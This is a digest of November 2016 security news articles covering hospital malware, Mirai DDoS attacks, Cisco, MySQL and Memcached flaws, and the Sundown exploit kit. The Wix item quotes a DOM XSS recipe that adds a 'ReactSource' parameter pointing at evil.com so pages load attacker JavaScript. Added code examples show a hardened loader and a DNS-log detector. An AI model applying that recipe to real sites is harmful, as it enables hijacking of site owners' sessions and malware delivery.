Malware used to spy on Iran’s nuclear negotiations at the Geneva venue
4.11.2016 thehackernews Virus
Switzerland’s attorney general has confirmed that it investigated the presence of spyware at a venue that also hosted talks on Iran’s nuclear programme.
Swiss officials confirmed that they found espionage malware in the computer equipment at a Geneva venue, a five-star hotel (believed to be the Hotel Président Wilson) that has hosted sensitive talks, including the Iranian nuclear negotiations.
“Investigations revealed that a significant number of computers (servers and clients) at a hotel in Geneva had been infected with a form of malware,” the Office of the Attorney General said in a statement on Thursday. “This malware was developed for the purposes of espionage, and is basically used to gather data from the computers infected.”
Gathering information on the nuclear talks is clearly a primary goal for the intelligence agencies of any country with an interest in how the negotiations between the governments involved are evolving.
The Swiss prosecutors have already closed the case because the cyber attack could not be attributed.
“A source said the malware was discovered on computers at the Hotel President Wilson, where talks on Iran’s nuclear work had taken place a month before, following a tip-off from the Swiss intelligence services.”
“The attorney general’s office said it was suspending proceedings because no evidence regarding the perpetrators’ identities had been obtained.
“Investigators raided the hotel 12 May last year after OAD who was investigating over illegal intelligence services operating in the country.” states a post published by Swissinfo.ch.
The Swiss state prosecutor has not ruled out reopening the investigation should new evidence of cyber espionage activity emerge.
“In Vienna, where the Iranian nuclear talks concluded in July 2015, the state prosecutor has launched two separate investigations into possible espionage. A spokesperson for the justice ministry told the Guardian that the two ongoing investigations were launched in June 2015 after bugging devices were discovered at Palais Coburg,” The Guardian reported.
“When the talks shifted to a luxury hotel in Vienna, the microwave radiation from the surveillance efforts of competing intelligence agencies was so intense that diplomats had to walk some distance from the venue to use their mobile phones.”
The Israeli government is one of the main suspects, but it has always denied accusations of cyber espionage, even though a Russian security firm speculated that the spyware used had similarities with tools attributed to Israeli cyber spies.
Hospitals on the National Health Service (NHS) network were paralyzed by malware
4.11.2016 securityaffairs Virus
Malware compromised the NHS network; hundreds of scheduled operations, appointments, and diagnostic procedures have been canceled.
The situation is becoming ever more worrying and dangerous, as the healthcare industry continues to be targeted by hackers and malware.
Cyber attacks on hospitals are a disconcerting trend that has emerged over the years; they represent a serious threat to both data and patient health.
A cyber attack could paralyze a hospital, with dramatic repercussions and unpredictable consequences.
On Sunday, malware compromised the National Health Service (NHS) network; hundreds of scheduled operations, appointments, and diagnostic procedures have been canceled.
The hospitals hit by the malware-based attack are all located in Lincolnshire, England. In response to the incident, the IT staff shut down all the systems within the shared IT network in order to “isolate and destroy” the malware.
Some patients, including major trauma patients, were diverted to the neighboring hospitals.
The hospitals affected by the incident are the Diana Princess of Wales in Grimsby, Scunthorpe general and Goole and District.
The Northern Lincolnshire and Goole NHS Foundation Trust (NLAG) announced that hospital systems in Scunthorpe and Grimsby were infected with a virus on October 30. The foundation classified the issue as a ‘Major incident’ on its website and via Twitter.
NHS NLaG (@NHSNLaG) tweeted on 1 Nov 2016: “To check which of our appointments are going ahead tomorrow following a major incident, visit our website http://www.nlg.nhs.uk”
“We have taken the decision, following expert advice, to shut down the majority of our systems so we can isolate and destroy it,” the NHS wrote on its website. “All planned operations, outpatient appointments and diagnostic procedures have been canceled for Wednesday, Nov. 2 with a small number of exceptions.”
At the time of writing the situation is returning to normal and the major systems are up and running again. The NHS Trust has not provided further details on the malware-based attack, nor on a possible data breach.
Security experts confirm that a growing number of cyber-attacks continue to hit hospitals, threatening unpatched medical devices.
In late 2015, MaineGeneral Health, a new state of the art hospital located in Augusta, Maine, reported that it had fallen victim of a cyberattack that leaked the names, addresses, and phone numbers for patients of its radiology services since June 2009. The attack is one of many in the past year where targeting of the medical industry, particularly hospitals, is on the rise.
Hollywood Presbyterian Hospital, Methodist Hospital in Henderson, Kentucky, Chino Valley Medical Center, and Desert Valley Hospital are just a few of the medical facilities hit with a wave of Cryptolocker attacks, costing an untold amount in ransom and cleanup.
Then there’s MedStar, the Washington D.C. based hospital chain whose infrastructure was crippled with a virus in late March. According to one report some 35,000 employees could not access emails or patient records. Cybercriminals behind the attack demanded 45 Bitcoins, at the time worth US$45,000, to unlock its systems and threatened to destroy the private key used to encrypt MedStar’s data if payment wasn’t made within ten days. Interestingly, the hackers also gave MedStar the option of releasing one computer at a time for 3 Bitcoins – how nice of them. It’s unknown whether MedStar paid the ransom, but four days later it reported that it had recovered “90 percent of its functionality.”
The medical industry has become fertile ground for cybercriminals, and it appears to be lagging behind other critical infrastructure sectors, such as the financial services industry, that have focused on hardening their networks for years. Hospitals are a smorgasbord of personally identifiable information and payment systems, which makes them attractive to snoops, thieves, and extortionists alike.
In February, two German hospitals were infected by ransomware, in a similar way to what occurred at the US Hollywood Presbyterian Medical Center.
Back to the NHS Trust case: there is no news about the type of malware that hit the systems, though some have speculated that the malicious code could be a ransomware strain that has previously targeted other hospitals and healthcare facilities.
Cyber security for critical infrastructure, and in particular for hospitals, must be part of the cyber strategy of any government.
Cisco patched critical flaws in 900 series routers and Prime Home server
4.11.2016 securityaffairs Vulnerability
Cisco issued patches for two critical vulnerabilities affecting several products, including Cisco 900 Series Routers and Cisco Prime Home servers.
Cisco has issued patches for two critical vulnerabilities affecting several products, including Cisco 900 Series Routers and Cisco Prime Home server and cloud-based network management platform.
The company published two security advisories to report the issues to its customers. One of the advisories warns service providers running Cisco ASR 900 Series routers of a flaw, tracked as CVE-2016-6441, in the Transaction Language 1 (TL1) code of the router. This flaw could be exploited remotely by an unauthenticated attacker to execute arbitrary code or force a reload of the affected equipment.
“A vulnerability in the Transaction Language 1 (TL1) code of Cisco ASR 900 Series routers could allow an unauthenticated, remote attacker to cause a reload of, or remotely execute code on, the affected system.” reads the advisory.
“The vulnerability exists because the affected software performs incomplete bounds checks on input data. An attacker could exploit this vulnerability by sending a malicious request to the TL1 port, which could cause the device to reload. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or cause a reload of the affected system.”
The company has released updates that fix the flaw, as well as workarounds to temporarily address the vulnerability.
The second flaw is a critical authentication bypass vulnerability, tracked as CVE-2016-6452, that resides in the web-based graphical user interface of Cisco Prime Home. The flaw could be exploited by a remote attacker to bypass authentication.
The flaw could be exploited by sending a crafted HTTP request to a specific URL, which allows the attacker to obtain a valid session identifier for an arbitrary user.
“A vulnerability in the web-based graphical user interface (GUI) of Cisco Prime Home could allow an unauthenticated, remote attacker to bypass authentication. The attacker could be granted full administrator privileges.” reads the advisory published by Cisco.
“The vulnerability is due to a processing error in the role-based access control (RBAC) of URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request to a particular URL. An exploit could allow the attacker to obtain a valid session identifier for an arbitrary user, which would allow the attacker to perform any actions in Cisco Prime Home for which that user is authorized—including users with administrator privileges.”
ISIS Is Watching You: Islamic State Hacking Team Shares Access to Security Cameras Around the World
4.11.2016 securityaffairs Cyber
BLACKOPS Cyber (BOC) reported to the authorities that a well-known ISIS hacking team was sharing access links to widely used surveillance systems.
BLACKOPS Cyber (BOC), a U.S. based Cyber Intelligence firm, located a new type of threat in October which is indicative of the latest focus of the terrorist organization – technical resource development for lone wolves around the world.
BOC revealed in a report to authorities that the team had identified where a well-known ISIS hacking team was sharing access links, as well as vulnerabilities, for widely used surveillance systems. Through late summer and early fall BOC witnessed the merger of two ISIS hacking groups that posted the surveillance camera links. “It literally took place before our eyes,” said a BLACKOPS Cyber spokesperson.
The cameras were located around the world, in the United States, Europe, Asia and Latin America. Along with the lists of cameras, the terrorists posted a video on how to access them. After examining the video, a BOC technical operative determined the vulnerability was “a viable rootkit vulnerability that would not require a lot of skill to execute.”
BOC noted that video surveillance companies need to examine their security vulnerabilities and address them as needed, adding that some systems may be vulnerable and others may not.
Recent attacks against the Dyn DNS service, powered by a huge IoT botnet, highlight the importance of properly addressing the security of devices such as CCTV cameras and DVRs connected to the Internet.
BLACKOPS Cyber stated that their primary concern was that terrorists could use control of the cameras to aid and conceal the activities of lone wolves. However, the concern that the access could be used to prepare for an attack exists as well, according to their spokesperson, who said, “While the cameras can be used to conceal an attack, they can also be used to plan and execute one. ISIS operatives and lone wolves have been known to surveil an area extensively before carrying out an attack, and this access makes that much easier for them.”
Making the job of carrying out an attack easier is something that ISIS seems to be attempting through technology, according to BLACKOPS Cyber. BOC reports that they have seen an upsurge in ISIS related technical information and training over the past year.
The BOC spokesperson noted, “Technical support for lone wolves has been a recent focus for ISIS operatives. The focus on technical training for new operatives is concerning whether it is the basics of concealing their identities or much more sophisticated technical capabilities.”
For this reason, BOC maintains that it is more important than ever for intelligence agencies to protect their online sources: “ISIS operatives are not only spending more time online, they are smarter about it. When we share our sources and resources or post critical intelligence channels on social media, they are certain to pick up on it.” According to BOC this can result in the loss of access to intel.
Image caption: One camera on the list from ISIS hackers provides a view of a square in a U.S. city (G-TV camera).
About the Author: GAYLE MURRAY
Gayle Murray is currently an analyst in the field of global intelligence and counter-terrorism with over 15 years experience in threat analysis, media relations, and international affairs.
Shadows Kill Mirai botnet caused an Internet outage in Liberia; what will be the next one?
4.11.2016 securityaffairs BotNet
The Mirai botnet was used to power a massive DDoS attack against Liberia, causing an Internet outage across the entire country with financially devastating results.
Mirai is the malware that a few weeks ago caused a massive Internet outage in the US. Mirai was first spotted this summer by the security expert MalwareMustDie; now the media report the use of the dreaded botnet against Liberia.
The financial repercussions of the massive DDoS attack on the country are devastating.
The massive DDoS attacks began a few days ago, impacting some Liberian internet providers, as security researcher Kevin Beaumont explained.
Beaumont credited the Mirai botnet for the attacks that hit the African country; he named this botnet “#14 Shadows Kill”, based on the message its operators sent.
Mirai Attacks (@MiraiAttacks) tweeted on 3 Nov 2016: “Botnet #14 - DNS flood for 1 seconds [Targets] kevin.lies.in.fear (8.8.8.8/32)”
“Over the past week we’ve seen continued short duration attacks on infrastructure in the nation of Liberia. Liberia has one internet cable, installed in 2011, which provides a single point of failure for internet access. From monitoring we can see websites hosted in country going offline during the attacks — additionally, a source in country at a Telco has confirmed to a journalist they are seeing intermittent internet connectivity, at times which directly match the attack. The attacks are extremely worrying because they suggest a Mirai operator who has enough capacity to seriously impact systems in a nation state.” Beaumont wrote in a blog post.
The Botnet #14 was able to generate a volume of traffic greater than 500 Gbps, enough to cause a massive outage in a country like Liberia.
“From monitoring, we can see websites hosted in country going offline during the attacks,” Beaumont added.
Unfortunately, it is becoming quite easy to create or rent a botnet powered by the Mirai malware due to the availability of its source code leaked online by the alleged author.
According to Flashpoint, which scanned the Internet with the Shodan search engine for flawed IoT devices, more than 500,000 vulnerable devices are in the wild. The countries with the highest number of vulnerable devices are Vietnam (80,000), Brazil (62,000) and Turkey (40,000).
Large-scale DDoS attacks continue to represent a serious threat to web services across the world, and IoT devices are a privileged attack vector due to their lack of security by design. IoT manufacturers are encouraged to take the security of their products seriously.
I reached out to MalwareMustDie for a comment on the real capabilities of the Mirai botnet.
Q: Which are the capabilities of the Mirai Botnet?
A: The Mirai botnet can do big damage, as per the several “demonstrations” they did, including the Liberia attack. The threat is seriously powerful, as I first mentioned in the Security Affairs interview. The way to stop it is either we push the effort to arrest the ‘skiddies’ related to this botnet, and be more strict in rules/policy for DDoS abuses, or be more aggressive in taking down infected IoT devices. Seriously, time is critical yet many people are still not acting faster; if we let this happen at the current pace, this Christmas or new year some countries and services can be shut down too … and they can do that.
Q: Is it possible to use Mirai to shut down a country like the UK or France?
A: If they know which point to attack, YES. They caused a major Internet outage in the United States for some hours, and the US has the strongest internet backbone on this planet.
It is my personal opinion that whoever released the code online was trying to rapidly increase the size of the Mirai botnet. More smoking guns make attribution harder; this could help crooks keep a lower profile and make it impossible to attribute nation-state attacks, even those against a foreign country.
It is clear that someone is using Botnet #14 to test a large-scale attack, probably against some government.
We have no time to lose; we need a new approach to cyber security, and IoT devices need security by design.
The number of attacks via botnets in Europe is skyrocketing
4.11.2016 SecurityWorld BotNet
The number of sophisticated attacks controlled by servers in Western Europe, as well as the number of victims in that region, is rising fast. According to data from Kaspersky Lab, between July and September 2016 botnet DDoS attacks hit targets in a total of 67 countries, and the strongest growth is visible precisely in Europe.
While the number of attacks in Japan, the United States and Russia grew, the number of Chinese and South Korean victims fell noticeably. In that quarter, three Western European states (Italy, France and Germany) appeared for the first time among the top 10 countries with the highest number of recorded DDoS attacks.
This is linked to the growing number of active C&C servers in Western Europe, above all in the United Kingdom, France and the Netherlands.
Despite the overall lower number of recorded attacks on China, that country was still the most targeted: a popular Chinese search engine alone was subjected to a total of 19 attacks, and the same provider also suffered the longest-lasting attack of the third quarter (184 hours).
The most active day for DDoS attacks in the past year was 3 August. The servers of one US service provider recorded 1,746 botnet attacks on that day.
SYN-DDoS attacks continued to grow in the third quarter, accounting for 81% of all registered attacks, while the share of TCP-DDoS and ICMP-DDoS fell again.
DDoS bots based on the Linux operating system also saw record growth, reaching a 79% share. This trend could be driven by the rising popularity of Linux-based Internet of Things (IoT) devices, which are increasingly abused for DDoS attacks. The trend is likely to be reinforced further after the Mirai leak.
Analysts also recorded an increase in “smart” attacks that encrypt the transmitted data. A typical example is sending a relatively small number of requests over an encrypted connection to “load-heavy” parts of a website (such as search forms).
Because of the transmission over an encrypted channel and their low intensity, such attacks are very hard for many specialised security solutions to filter.
Hundreds Of Operations Canceled After Malware Hacks Hospitals Systems
3.11.2016 thehackernews Virus
They are not just hacking your email and online banking accounts anymore.
Computer viruses do not distinguish between a personal computer or a hospital machine delivering therapy to patients — and the results could prove deadly.
Cyber attacks on hospitals have emerged as a significant cyber security risk in 2016, which not only threaten highly sensitive information but also potentially harm the very lives of those being protected.
In the latest incident, hundreds of planned operations, outpatient appointments, and diagnostic procedures have been canceled at multiple hospitals in Lincolnshire, England, after a "major" computer virus compromised the National Health Service (NHS) network on Sunday.
In a bright-red alert warning labeled "Major incident" on its website, the Northern Lincolnshire and Goole NHS Foundation Trust (NLAG) said its systems in Scunthorpe and Grimsby were infected with a virus on October 30.
The incident forced the trust to shut down all the major systems within its shared IT network in order to "isolate and destroy" the virus and cancel surgeries.
"We have taken the decision, following expert advice, to shut down the majority of our systems so we can isolate and destroy it," the NHS wrote on its website. "All planned operations, outpatient appointments and diagnostic procedures have been canceled for Wednesday, Nov. 2 with a small number of exceptions."
Some patients, including major trauma patients and high-risk women in labor, were diverted to neighbouring hospitals.
Although the majority of systems are now back and working, the NHS Trust has not provided any specific information about the sort of virus or malware involved, or whether it managed to breach any data.
The incident took place after the U.S. and Canada issued a joint cyber alert warning hospitals and other organizations about a surge in extortion attacks that infect computers with ransomware, which encrypts data and demands money for it to be unlocked.
Although it is unclear at the moment, the virus could likely be ransomware that has previously targeted hospitals and healthcare facilities.
Life Threatening Cyber-Attacks
With the rise of the ransomware threat, we have seen enormous growth in the malware business.
The countless Bitcoin transactions flowing into the dark web have encouraged ransomware authors to distribute their code more widely and adopt new infection methods to achieve a higher success rate.
Today, both corporations and hospitals have become soft targets for ransomware.
Since earlier this year, over a dozen hospitals have been targeted by ransomware, which freezes their central medical systems and forces them to pay the ransom amount demanded.
Technological advancement in the medical arena has digitalized patient data in the form of Electronic Medical Records (EMR) stored in the hospital's central database.
Since a delay in patient treatment caused by temporarily locking down their records could even result in a patient's death, attackers who infect hospitals with ransomware can count on a near-certain payout.
For this reason, in most cases hospitals agree to pay the ransom amount to the attackers.
Earlier this year, the Los Angeles-based Presbyterian Medical Center paid $17,000 in Bitcoins to cyber crooks in order to restore access to its electronic medical systems after a ransomware virus hit the hospital.
Also, back in April the MedStar Health chain, which runs a number of hospitals in the Baltimore and Washington area, was attacked with Samsam ransomware (or Samas), which encrypted sensitive data at the hospitals.
Subsequently, many more hospitals, including Methodist Hospital in Henderson, Kentucky, Desert Valley Hospital in California and Chino Valley Medical Center, have been infected with ransomware.
19-Year-Old Teenage Hacker Behind DDoS-for-Hire Service Pleads Guilty
3.11.2016 thehackernews Hacking
Following the worldwide publicity around the Mirai botnet that knocked out a large part of the Internet last Friday, hackers and even script kiddies have started building their own botnets by hacking millions of IoT devices and selling them as DDoS-for-hire services to overwhelm targets with data.
A 19-year-old student from Hertford has pleaded guilty to running one such DDoS-for-hire service, which quickly became one of the most popular DDoS booter tools on the market for conducting distributed denial of service (DDoS) attacks.
Dubbed Titanium Stresser, the tool was used to conduct coordinated DDoS attacks around the world and brought Adam Mudd an income of more than US$385,000 (£315,000, A$505,000), according to the Eastern Region Special Operations Unit (ERSOU).
On 28 October at the Old Bailey, Mudd pleaded guilty to two counts of the Computer Misuse Act and one count of money laundering offense and will be sentenced in December.
Mudd, who was arrested at his home in 2015, admitted to committing unauthorized acts of creating the DDoS service, using it himself, and then renting it to other cyber criminals through the service's website.
Prosecutor Jonathan Polnay says the teenager allegedly launched 592 DDoS attacks against 181 IP addresses between December 2013 and March last year.
"Titanium Stresser is a computer program created by the defendant, and it is not an unimpressive piece of software in terms of design," Polnay told the court. "It carried out DDoS attacks, and it takes down computer networks and websites."
Moreover, from the detailed logs authorities discovered in his home, investigators were able to determine that other criminals had used Titanium Stresser to launch a whopping 1.7 Million DDoS attacks on targets worldwide.
It is also believed that the infamous Lizard Squad gang used the source code of Titanium Stresser as a base for its Lizard Stresser -- another DDoS-for-hire service most famously used to take down the PlayStation and Xbox Live networks in 2014.
Mudd is scheduled to be sentenced in December 2016.
Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released)
3.11.2016 thehackernews Vulnerability
Over a month ago we reported about two critical zero-day vulnerabilities in the world's 2nd most popular database management software MySQL:
MySQL Remote Root Code Execution (CVE-2016-6662)
Privilege Escalation (CVE-2016-6663)
At that time, Polish security researcher Dawid Golunski of Legal Hackers who discovered these vulnerabilities published technical details and proof-of-concept exploit code for the first bug only and promised to release details of the second bug (CVE-2016-6663) later.
On Tuesday, Golunski has released proof-of-concept (POC) exploits for two vulnerabilities:
One is the previously promised critical privilege escalation vulnerability (CVE-2016-6663), and another is a new root privilege escalation bug (CVE-2016-6664) that could allow an attacker to take full control over the database.
Both the vulnerabilities affect MySQL version 5.5.51 and earlier, MySQL version 5.6.32 and earlier, and MySQL version 5.7.14 and earlier, as well as MySQL forks — Percona Server and MariaDB.
Privilege Escalation/Race Condition Bug (CVE-2016-6663)
The more severe of the two is the race condition bug (CVE-2016-6663) that can allow a low-privileged account (with CREATE/INSERT/SELECT grants) with access to the affected database to escalate their privileges and execute arbitrary code as the database system user (i.e. 'mysql').
Once exploited, an attacker could successfully gain access to all databases within the affected database server.
Root Privilege Escalation (CVE-2016-6664)
Another critical flaw in MySQL database is a root privilege escalation bug that could allow attackers with 'MySQL system user' privilege to further escalate their privileges to root user, allowing them to fully compromise the system.
The issue stems from unsafe handling of the error log and other files that fall under the MySQL system user's privileges; such a file can be replaced with an arbitrary system file, which opens the door to root privileges.
What's more troublesome, an attacker with only a low-privileged database account can also reach root by first exploiting the privilege escalation flaw (CVE-2016-6663) to become the 'MySQL system user', and then chaining CVE-2016-6664 to fully compromise the targeted server.
All of these vulnerabilities could be exploited in shared hosting environments where users are assigned access to separate databases; by exploiting the flaws, a user could gain access to all databases on the server.
Golunski has published the proof-of-concept exploit code (Exploit 1, Exploit 2) for both the flaws and will soon upload videos.
MySQL has fixed the vulnerabilities and all of the patches ultimately found their way into Oracle's quarterly Critical Patch Update last month.
Administrators are strongly advised to apply patches as soon as possible in order to avoid hackers seeking to exploit the vulnerabilities.
If you are unable to apply the patches immediately, then as a temporary mitigation you can disable symbolic link support in your database server configuration by setting symbolic-links = 0 in my.cnf.
Critical DOM XSS flaw on Wix.com puts millions of websites at risk
3.11.2016 securityaffairs Vulnerability
A DOM-based cross-site scripting vulnerability in the cloud-based development platform Wix.com puts millions of websites at risk.
The cloud-based development platform Wix.com is affected by a DOM-based cross-site scripting vulnerability that could be exploited by attackers to gain full control over any website running on the popular platform. Millions of websites hosted on Wix.com are potentially at risk.
At the time of writing the flaw was still present, as confirmed by Matt Austin (@mattaustin), senior security research engineer with Contrast Security, who discovered the issue.
“DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.” reads the description published by the OWASP.
DOM-based XSS is quite different from a reflected or stored XSS attack, in which the malicious payload is embedded in the response page because of a server-side vulnerability.
Below is an excerpt from Austin’s blog post.
“Wix.com has a severe DOM XSS vulnerability that allows an attacker complete control over any website hosted at Wix. Simply by adding a single parameter to any site created on Wix, the attacker can cause their JavaScript to be loaded and run as part of the target website.
TL;DR:
Add: ?ReactSource=http://evil.com to any URL for any site created on wix.com.
Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js
Here’s an example exploit occurring, causing a reflected payload to occur:
Austin said he has tried several times since early October to report the vulnerability to Wix.com, without success.
Wix.com states that 86 million users currently use its platform.
Austin detailed two different attack scenarios. In the first, a Wix website owner is lured by attackers into visiting a malicious URL loaded with specially crafted JavaScript that can hijack the target’s browser session. The attacker gains the victim’s browser session and can act on their behalf with full control over the website.
“Administrator control of a wix.com site could be used to widely distribute malware, create a dynamic, distributed, browser-based botnet, mine cryptocurrency, and otherwise generally control the content of the site as well as the users who use it.” wrote Austin.
In a second attack scenario, a user is lured to a Wix website by a specially crafted URL that loads JavaScript into the targeted Wix.com site via a DOM-based XSS attack. A Wix.com-based website could be modified by the attacker for a specific browser session to serve malicious code.
In both scenarios, attackers need to host malicious JavaScript on a server and point to it within a URL (e.g. “http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com”).
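The loading pattern Austin describes, beside a hardened alternative, as an added example written for this page (it is not Wix’s code or Austin’s): the query parameter, bundle path and sample URL come from the text above, while the `example-cdn.invalid` origins, the allowlist and the function names are assumptions.

```javascript
// Added example (not Wix's code): a hypothetical reconstruction of the
// "ReactSource" script-loading pattern described above, next to a hardened
// version. Written as pure functions over the page URL so it runs in Node.

// Bundle path the page says the attacker must host; it is appended to
// whichever origin wins, in both versions.
const BUNDLE_PATH = '/packages-bin/wixCodeInit/wixCodeInit.min.js';

// Placeholder for the platform's own static-asset origin (assumed name).
const DEFAULT_ORIGIN = 'https://static.example-cdn.invalid';

// Origins an override may legitimately select (assumed, e.g. a staging CDN).
const ALLOWED_ORIGINS = new Set([
  DEFAULT_ORIGIN,
  'https://staging.example-cdn.invalid',
]);

function reactSourceParam(pageUrl) {
  return new URL(pageUrl).searchParams.get('ReactSource');
}

// Vulnerable pattern: whatever the ReactSource parameter carries is trusted
// as the base of the script URL, so any visitor can be made to load the
// bundle from a host chosen by whoever crafted the link (DOM-based XSS).
function vulnerableScriptSrc(pageUrl) {
  const override = reactSourceParam(pageUrl);
  const base = (override || DEFAULT_ORIGIN).replace(/\/+$/, '');
  return base + BUNDLE_PATH;
}

// Returns the override's origin only if it parses as a URL, uses https and
// matches an allowlisted origin exactly; otherwise null. Comparing .origin
// means userinfo, paths or query strings in the parameter cannot smuggle a
// different host past the check.
function acceptedOverrideOrigin(override, allowed) {
  let candidate;
  try {
    candidate = new URL(override);
  } catch (e) {
    return null; // not a URL at all: ignore the override
  }
  if (candidate.protocol !== 'https:') return null;
  return allowed.has(candidate.origin) ? candidate.origin : null;
}

// Hardened pattern: unrecognised overrides fall back to the default origin.
function hardenedScriptSrc(pageUrl, allowed = ALLOWED_ORIGINS) {
  const override = reactSourceParam(pageUrl);
  const origin =
    (override && acceptedOverrideOrigin(override, allowed)) || DEFAULT_ORIGIN;
  return origin + BUNDLE_PATH;
}

// Log-review helper for defenders: does this request carry a ReactSource
// value the hardened loader would have rejected?
function isSuspiciousOverride(pageUrl, allowed = ALLOWED_ORIGINS) {
  const override = reactSourceParam(pageUrl);
  return override !== null && acceptedOverrideOrigin(override, allowed) === null;
}

// Sample URL from the article, run through both loaders.
const SAMPLE_URL = 'http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com';
console.log('vulnerable:', vulnerableScriptSrc(SAMPLE_URL));
console.log('hardened:  ', hardenedScriptSrc(SAMPLE_URL));
console.log('suspicious:', isSuspiciousOverride(SAMPLE_URL));
```

In a browser the returned string would be assigned to a script element's `src`; the hardened loader's allowlist check is the part that closes the hole.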
Sundown exploit kit – Conquering the criminal underground
3.11.2016 securityaffairs Exploit
Cisco Talos group analyzed the evolution of the Sundown exploit kit that over the past six months has become responsible for a large number of infections.
Over the past months, the exploit-kit threat landscape has been changing rapidly: Angler EK, Neutrino EK and Nuclear EK, which for years dominated the criminal underground, have disappeared.
Now, researchers at Cisco Talos group analyzed the rapid evolution of a new threat, the Sundown exploit kit that over the past six months has become responsible for a large number of infections.
“Over the last six months the exploit kit landscape has seen some major changes.” reads a blog post published by the Talos Group. “What remains is a group of smaller exploit kits vying for pole position in an industry that continues to generate millions of dollars from payloads such as ransomware and banking trojans.”
“It’s now time to turn to another exploit kit that is active on the landscape, Sundown. The Sundown exploit kit has previously been part of a second tier of exploit kits that includes Magnitude and Sweet Orange. These kits successfully compromise users, but typically are not accompanied with the advanced techniques and wide-spread use of the other major exploit kits. It’s not to say these kits aren’t significant threats, but from a potential victim perspective they historically do not have the reach associated with other EKs from before such as Angler or RIG.”
The Sundown EK currently ranks second, behind RIG EK, the most used crimeware kit in the criminal ecosystem.
The threat actors behind the Sundown exploit kit rely on an infrastructure of 80,000 malicious subdomains associated with more than 500 domains.
The experts observed that the crooks behind Sundown are using wildcard DNS records for subdomains, which exponentially increases the number of routes for malicious traffic to the servers hosting the EK.
The downside of wildcards is the impact on the core domain: while the domain is active, anyone who resolves the base domain itself is also directed to the malicious server used by the crooks.
In one case, the researchers observed in a 24-hour period a particular Sundown domain generating three subdomains a minute.
“For a 24 hour period this particular Sundown campaign was seen generating approximately 3 subdomains a minute for the entire day.” states the analysis.
Count of Unique Sundown Subdomains by Day (Talos analysis)
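The subdomain churn Talos describes, as an added detection example that is not part of the Talos analysis: it counts distinct subdomains per base domain per minute over constructed DNS query log lines (the `bad-ek.example` and `corp-site.example` names and the log format are assumptions) and flags domains that reach the three-per-minute rate quoted above.

```javascript
// Added example (not Talos's tooling): flag base domains whose subdomains
// churn at exploit-kit rates, using DNS query logs.
// Assumed line format: "<ISO-8601 timestamp> <client IP> <queried name>".
// All names and addresses below are constructed for the example.
const SAMPLE_DNS_LOG = `
2016-10-20T10:00:01Z 10.0.0.5 a1b2c3.bad-ek.example
2016-10-20T10:00:03Z 10.0.0.5 www.corp-site.example
2016-10-20T10:00:15Z 10.0.0.7 q9x8z7.bad-ek.example
2016-10-20T10:00:31Z 10.0.0.5 a1b2c3.bad-ek.example
2016-10-20T10:00:40Z 10.0.0.9 m4n5o6.bad-ek.example
2016-10-20T10:00:55Z 10.0.0.5 k7l8m9.bad-ek.example
2016-10-20T10:01:10Z 10.0.0.7 p0o9i8.bad-ek.example
2016-10-20T10:02:03Z 10.0.0.7 mail.corp-site.example
2016-10-20T10:03:03Z 10.0.0.7 corp-site.example
`;

// Parse one record per non-empty line; names are normalised to lowercase
// with any trailing dot removed so repeats of the same name compare equal.
function parseDnsLog(text) {
  return text
    .trim()
    .split('\n')
    .map((line) => {
      const [ts, client, qname] = line.trim().split(/\s+/);
      return {
        time: Date.parse(ts),
        client,
        qname: qname.toLowerCase().replace(/\.$/, ''),
      };
    });
}

// Registrable domain approximated as the last two labels. Good enough for
// the sample; a real deployment should consult the Public Suffix List.
function baseDomain(qname) {
  return qname.split('.').slice(-2).join('.');
}

// For every base domain, bucket the distinct subdomains queried into
// one-minute windows. A domain is reported when the busiest window holds at
// least `perMinuteThreshold` distinct subdomains. Repeated lookups of the
// same name within a window count once; apex queries are ignored.
function findSubdomainChurn(records, perMinuteThreshold = 3) {
  const perDomain = new Map(); // base -> Map(minuteBucket -> Set(qname))
  for (const r of records) {
    const base = baseDomain(r.qname);
    if (base === r.qname) continue; // apex, no subdomain
    const bucket = Math.floor(r.time / 60000);
    if (!perDomain.has(base)) perDomain.set(base, new Map());
    const buckets = perDomain.get(base);
    if (!buckets.has(bucket)) buckets.set(bucket, new Set());
    buckets.get(bucket).add(r.qname);
  }

  const findings = [];
  for (const [base, buckets] of perDomain) {
    const all = new Set();
    let peak = 0;
    for (const names of buckets.values()) {
      peak = Math.max(peak, names.size);
      for (const n of names) all.add(n);
    }
    if (peak >= perMinuteThreshold) {
      findings.push({ base, peakPerMinute: peak, uniqueSubdomains: all.size });
    }
  }
  return findings.sort((a, b) => b.peakPerMinute - a.peakPerMinute);
}

// Run the detector over the constructed sample with the article's rate.
function scanSample() {
  return findSubdomainChurn(parseDnsLog(SAMPLE_DNS_LOG), 3);
}

console.log(scanSample());
```

Against the sample only `bad-ek.example` is reported, with four distinct subdomains in its busiest minute; the corporate domain's `www` and `mail` names never reach the threshold.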
While RIG EK was used to drop a variety of malicious payloads, including banking Trojans and data stealers, the Sundown exploit kit was used only to serve banking Trojans. Talos has observed Sundown campaigns leveraging both Adobe Flash and Silverlight vulnerabilities to compromise victims’ systems.
“One interesting aspect is that they used standard extensions for those files. All requests for flash files end in “.swf” and all silverlight requests end in “.xap” which isn’t particularly common for exploit kits as they typically will try and obfuscate the activity.” continues the analysis.
Talos also highlighted a blunder by the threat actors: browsing directly to an active Sundown landing page without any parameters, the researchers retrieved a Base64-encoded Sundown logo instead of empty data or a 404.
The text on the image states “Yugoslavian Business Network.”
For more information, take a look at the report, which also includes the IOCs for the Sundown exploit kit:
Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System
2.11.2016 thehackernews Vulnerebility
Hey Webmasters, are you using Memcached to boost the performance of your website?
Beware! It might be vulnerable to remote hackers.
Three critical Remote Code Execution vulnerabilities have been reported in Memcached by security researcher Aleksandar Nikolich at Cisco Talos Group that expose major websites, including Facebook, Twitter, YouTube, Reddit, to hackers.
Memcached is a popular open-source distributed memory caching system that stores objects in memory. It is designed to speed up dynamic web applications by reducing the load on the database, which helps administrators increase performance and scale web applications.
